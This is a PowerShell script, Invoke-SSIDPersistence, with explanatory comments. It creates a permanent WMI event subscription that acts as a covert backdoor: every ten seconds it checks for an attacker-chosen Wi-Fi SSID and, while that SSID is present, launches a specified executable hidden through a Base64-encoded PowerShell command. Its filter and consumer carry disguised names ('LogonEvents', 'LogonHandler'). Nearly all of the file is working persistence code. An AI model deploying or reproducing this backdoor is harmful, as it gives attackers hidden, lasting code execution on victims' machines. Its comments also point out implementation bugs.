Invoke-SSIDPersistence.ps1
<#
.SYNOPSIS
WMI binding Function that continually monitors the air for a SSID which you specify as a backdoor trigger. If you have something within range of
the target to emit wireless signals with a given "evil ap" SSID, it'll execute a binary and keep it open until
the wireless signal disappears.
.DESCRIPTION
WMI binding Function that continually monitors the air for a SSID which you specify as a backdoor trigger. If you have something within range of
the target to emit wireless signals with a given "evil ap" SSID, it'll execute a binary and keep it open until
the wireless signal disappears.
.PARAMETER NetworkName
SSID that acts as the trigger. Compared against the "SSID n : <name>" lines of `netsh wlan show networks mode=Bssid`.
.PARAMETER EXEPath
Full path of the executable to start while the SSID is visible. The same path is compared against the Path of running
processes to decide whether to start it or to stop it.
.PARAMETER FilterName
Intended name of the __EventFilter instance. NOTE: the function body reassigns $filterName to the literal 'LogonEvents'
before the filter is created, so this parameter currently has no effect.
.PARAMETER ConsumerName
Intended name of the CommandLineEventConsumer instance. NOTE: likewise replaced by the literal 'LogonHandler' in the body.
.EXAMPLE
PS> Invoke-SSIDPersistence -NetworkName "3v1ln3tw0rk" -EXEPath "c:\windows\system32\evil.exe" -FilterName "evilap" -ConsumerName "evilconsumer"
This will check the air every 10 seconds for a SSID called "3v1ln3tw0rk" and execute evil.exe while the network exists.
The idea came from: http://www.irongeek.com/i.php?page=videos/bsideslasvegas2015/atgp06-wi-door-bindrev-shells-for-your-wi-fi-vivek-ramachandran
.NOTES
Persistence takes the form of a permanent WMI event subscription in root\subscription: an __EventFilter, a
CommandLineEventConsumer and a __FilterToConsumerBinding. On each trigger the consumer launches powershell.exe with
the whole inner script passed as a Base64 -enc argument, so the complete payload appears on that process's command line.
#>
function Invoke-SSIDPersistence
{
Param(
[Parameter(Mandatory=$true)]
[string]$NetworkName,
[Parameter(Mandatory=$true)]
[string]$EXEPath,
[string]$FilterName = "NewEventFilter",
[string]$ConsumerName = "NewConsumer"
)
# Inner script executed by the WMI consumer on every trigger. It is built as a here-string:
# the backtick-escaped `$ names are variables of the inner script, while $NetworkName and
# $EXEPath are interpolated here as single-quoted literals. `$filename is computed but never
# used by the inner script. No comments are placed inside the here-string because they would
# become part of the payload text.
$cmd = @"
`$NetworkName = `'$NetworkName`'
`$EXEPath = `'$EXEPath`'
`$x = (netsh wlan show networks mode=Bssid | Select-String -Pattern "^SSID [0-9]{1,3} : " | % { `$_.ToString().Split(":")[1].trim() }).split("``r``n",[System.StringSplitOptions]::RemoveEmptyEntries)
`$filename = Split-Path `$EXEPath -Leaf
if (`$x -contains `$NetworkName) {
if (-not ((Get-Process).Path -contains `$EXEPath)) {
Start-Process `$EXEPath -WindowStyle Hidden
}
} else {
Get-Process | where-object { `$_.Path -eq `$EXEPath } | stop-process -force
}
"@
# powershell.exe -enc expects the command as Base64 of its UTF-16LE (Unicode) bytes.
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encodedString = [Convert]::ToBase64String($bytes)
# Decode helper for inspecting $encodedString, left commented out by the author:
#[system.text.encoding]::unicode.getstring([system.convert]::FromBase64String($encodedString))
# NOTE: PowerShell variable names are case-insensitive, so these two assignments overwrite the
# -FilterName / -ConsumerName parameter values. The WMI objects below are therefore always
# created under the names 'LogonEvents' and 'LogonHandler', whatever the caller passed.
$filterName = 'LogonEvents'
$consumerName = 'LogonHandler'
# Fires on every Win32_LocalTime modification whose Second field ends in 5, i.e. once every 10 seconds.
$Query = "Select * From __InstanceModificationEvent Where TargetInstance Isa 'Win32_LocalTime' And TargetInstance.Second LIKE '%5'"
$psexe = 'powershell.exe'
$psargs = "-noprofile -nologo -win hidden -enc $encodedString"
# Permanent WMI event subscription: filter, consumer, then the binding that joins them.
# Only the filter creation uses -ErrorAction Stop; a failure in the consumer or binding call is
# not stopped here. '-Argument' on the consumer call is accepted as an unambiguous prefix of -Arguments.
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$FilterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Argument @{Name=$ConsumerName;ExecutablePath=$psexe;CommandLineTemplate=$psargs}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
}